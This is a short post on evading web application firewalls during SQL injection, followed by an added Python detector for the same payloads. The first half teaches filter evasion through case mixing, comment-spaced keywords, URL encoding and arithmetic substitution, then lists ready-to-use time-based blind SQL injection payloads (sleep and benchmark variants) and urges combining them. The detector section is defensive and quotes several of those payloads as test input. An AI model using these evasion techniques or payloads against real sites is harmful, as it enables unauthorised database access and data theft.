Bypass waf firewall
To increase the likelihood of a successful injection test using these random payloads, you can follow some approaches and techniques that vary the payloads based on how the database servers interpret the queries.
Using Substitutions in Keywords
You can substitute equivalent operators such as or, xor, and || to evade security filters that match specific keywords.
Example:
or sleep(4) ➔ oR sLeEP(4) or xor sleep(4)
Entering camouflaged spaces and comments
Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:
or sleep(4) ➔ or/**/sleep(4) or or sLeEp(/**/4)
Using mathematical expressions
Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:
4 ➔ 6-2 or true+true
Changing the simple formula
The formula for simple payloads can also be changed.
Example:
sleep(4) ➔ sleep((4)) or benchmark(4)
Mixing multiple payloads in a single request
You can combine two or more payloads to increase complexity.
Example:
%27 or sleep(4) -- ➔ %27 oR sLeEP(4) || true+true --
4|0 or benchmark(4) ➔ (4|0) oR beNCHMark(/**/4)
Entering different parentheses
Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:
or (sleep(4)) ➔ or %28sleep%284%29
Using Uncommon Phrases
Using uncommon or advanced phrases like benchmark instead of sleep may help avoid detection.
Example:
or sleep(4) ➔ or benchmark(4)
Logical Construct Tests
You can also test payloads with logical constructs.
Example:
or sleep(4) ➔ or (sleep(4) && true=true)
Complete example:
' oR sLeEP(/**/4) || true+true --
Here are some more random payloads to use in your SQL injection test:
'%27 OR sleep(4) --
%28%29 XOR sLeEp(4) --
(4|0) oR beNCHMark(/**/4) --
' OR 6-2=4 || sleep(4) --
') OR true+true=sleep(4) --
%27 oR sLeEp(4) = (true) --
' xor sLeEP((4)) --
%27 = (1=(sleep(4))) --
%28%29 OR beNcHmArk(4) --
' XOR sleep(/**/4) || -true*4 --
Combine some of these payloads:
You can mix payloads together to make the attack more complex:
'%27 OR sleep(4) || (true=true) -- ')
These payloads randomly diversify attacks that may pass through some filters or protection methods.
#waf #sql
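From the defending side, the case, comment, encoding and arithmetic variations above all collapse once a value is normalized before matching. The following Python code is an added example, not part of the original post; the function names, the signal set and the benign samples are assumptions, and the payload strings are copied from the list above as constructed test input.

```python
import re
from urllib.parse import unquote

# Delay functions named on this page; extend for the DBMS actually in use.
DELAY_CALL = re.compile(r"\b(?:sleep|benchmark)\s*\(")
# Supporting signals: each is common in benign text, so none alerts by itself.
CONTEXT = {
    "quote": re.compile(r"'"),
    "bool_op": re.compile(r"\b(?:or|xor)\b|\|\||&&"),
    "sql_comment": re.compile(r"--"),
}

def normalize(raw: str) -> str:
    """Reduce a parameter value to the form the SQL parser effectively sees."""
    s = raw
    for _ in range(3):                  # URL-decode until stable (bounded)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # /**/ acts as whitespace
    s = re.sub(r"\s+", " ", s)          # collapse tabs, newlines, space runs
    return s.lower().strip()            # SQL keywords are case-insensitive

def signals(raw: str) -> set:
    """Names of all signals present in the normalized value."""
    s = normalize(raw)
    found = {name for name, rx in CONTEXT.items() if rx.search(s)}
    if DELAY_CALL.search(s):
        found.add("delay_call")
    return found

def is_suspicious(raw: str) -> bool:
    """Alert on a delay-function call that appears together with SQL context.
    The numeric argument is ignored, so 4, 6-2 and true+true score the same."""
    found = signals(raw)
    return "delay_call" in found and len(found) > 1

# Constructed test input: payloads copied from this page, plus benign text.
PAGE_PAYLOADS = [
    "'%27 OR sleep(4) --", "%28%29 XOR sLeEp(4) --",
    "(4|0) oR beNCHMark(/**/4) --", "') OR true+true=sleep(4) --",
    "%27 = (1=(sleep(4))) --", "' XOR sleep(/**/4) || -true*4 --",
]
BENIGN = ["I need sleep (8 hours)", "benchmark results for Q4", "O'Reilly or Manning"]

if __name__ == "__main__":
    for value in PAGE_PAYLOADS + BENIGN:
        print(is_suspicious(value), sorted(signals(value)), repr(value))
```

Matching like this is a detection aid for logs and WAF rules; parameterized queries remove the injection point regardless of how the payload is written.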